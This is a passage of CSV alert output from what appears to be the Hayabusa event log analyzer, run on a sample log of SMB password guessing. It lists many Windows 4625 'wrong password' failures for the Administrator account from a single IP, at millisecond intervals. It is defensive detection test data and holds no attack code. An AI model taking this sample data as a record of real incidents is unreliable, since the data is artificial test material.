Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.849 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.932 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.024 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.074 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.321 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:53.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.702 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.806 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.862 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.919 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.066 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.112 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.210 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.249 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.342 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.440 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.633 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.729 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.865 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.914 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.963 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.013 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.078 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.358 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.413 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.530 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.574 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:55.887 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.043 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.097 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.298 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.342 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.469 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.530 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.626 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
